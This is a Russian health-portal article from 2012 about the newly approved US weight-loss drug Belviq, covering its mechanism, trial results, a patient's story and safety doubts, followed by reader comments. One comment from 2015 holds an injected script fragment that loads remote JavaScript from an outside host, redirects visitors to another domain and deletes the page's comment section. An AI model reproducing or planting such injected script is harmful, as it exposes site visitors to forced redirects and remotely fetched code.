Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новый препарат для снижен...  >>  Новый препарат для снижения веса
 
Обратная связь
 

Новый препарат для снижения веса

Размер шрифта
08 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Недавно в Америке был зарегистрирован новый препарат «Белвик» для лечения ожирения, который  регулирует аппетит и предназначен для длительного применения в сочетании с низкокалорийной диетой и физическими упражнениями.

новый препарат для снижения веса

Всемирная организация здравоохранения (ВОЗ) считает ожирение пандемией 21 века – ожирением страдает огромное количество людей. К сожалению, диеты и изменение образа жизни далеко не всегда позволяют победить это заболевание.

Информация о препарате

«Белвик» воздействует на рецепторы серотонина, которые расположены в головном мозге и регулируют аппетит. Он используется у пациентов с индексом массы тела более 30 (ожирение) или у пациентов с индексом массы тела 27 и более (избыточная масса тела) при наличии таких факторов риска как высокое артериальное давление, сахарный диабет 2 типа или высокий уровень холестерина. Препарат противопоказан при беременности.

Согласно данным исследования, уменьшение массы тела более чем на 5% наблюдалось у половины людей, принимавших «Белвик» в течение одного года, тогда как в группе, получавшей плацебо, доля таких людей составила всего 20%. Также следует отметить, что людям, которые принимали препарат в течение двух лет, чаще удавалось сохранить достигнутую форму.

История похудения

Лиза Саттер проживает в пригороде Вашингтона. Она поправилась после рождения детей и не могла избавиться от лишних килограммов до тех пор, пока не приняла участие в исследовании. В рамках исследования Лиза принимала «Белвик» в течение одного года. За это время изменилось ее отношение к еде, и ей удалось сбросить 18 кг.

- Когда я принимала «Белвик», мне было легко придерживаться низкокалорийной диеты, поскольку я не испытывала голода. Если я съедала больше, чем предписывала диета, я чувствовала, что переедаю.

Спустя год Лиза прекратила прием препарата, и начала набирать вес. В настоящее время она весит на 13,5 кг больше, чем перед началом исследования, поэтому Лиза планирует возобновить прием препарата как можно скорее.

Безопасность препарата

Несмотря на то что «Белвик» зарегистрирован, вопрос о безопасности препарата остается открытым. Ученые высказывают опасения по поводу того, что «Белвик» может вызывать рак молочной железы и нарушать работу клапанов сердца. Однако ультразвуковое исследование сердца людей, принимавших препарат, свидетельствует об отсутствии нарушения работы клапанов.

Врачи надеются, что в дальнейшем у них появится несколько препаратов для лечения ожирения. Если один препарат не сможет помочь пациенту, ему можно будет назначить другой или одновременно несколько препаратов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Наталья12

12 августа 2012 в 19:07

Цитировать   |   Пожаловаться

такие препараты наверное каждый день выходят! не знаю... я не доверяю таким вещам! только здоровье портить!

2 - Гость

16 августа 2012 в 00:48

Комментарий удален за нарушение Правил общения

3 - Гость

16 сентября 2012 в 10:35

Цитировать   |   Пожаловаться

интересно он уже появился в продаже хотя бы в америке?

Гость 16 сентября 2012 в 10:35
интересно он уже появился в продаже хотя бы в америке?
 Пока данных за появление в продаже нет

5 - tanya

31 октября 2012 в 09:36

Цитировать   |   Пожаловаться

если после прекращения приема препарата она поправилась, получается его надо всю жизнь принимать.

tanya 31 октября 2012 в 09:36
если после прекращения приема препарата она поправилась, получается его надо всю жизнь принимать.
 Отнюдь не это получается. Получается, что худеть надо не только принимая препарат Волшебных таблеток не бывает! Лекарство - как вспомогательный фактор, главное - рассчет калорий, правильное питание, физическая активность! И, если после отмены препарата, вес восстановился, то значит, кроме лекарства ничего не было использовано - хороший момент упущен, лечение было напрасным.

7 - Гость

24 мая 2014 в 23:01

Цитировать   |   Пожаловаться

А я принимаю.Это пролекарство,как известно.А он также эффективен,как и просто лек-во сибутрамин(редуксин)?

8 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
10 правил похудения, которые действительно работают   Ученые нашли новый способ похудения   Почему мужчины худеют быстрее женщин   Как ваши подруги мешают вам худеть!  
15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
Еда для снижения веса
Как похудеть ленивой?
Чего не делать, если вы набрали вес?

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Жиры, которые мы едим
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.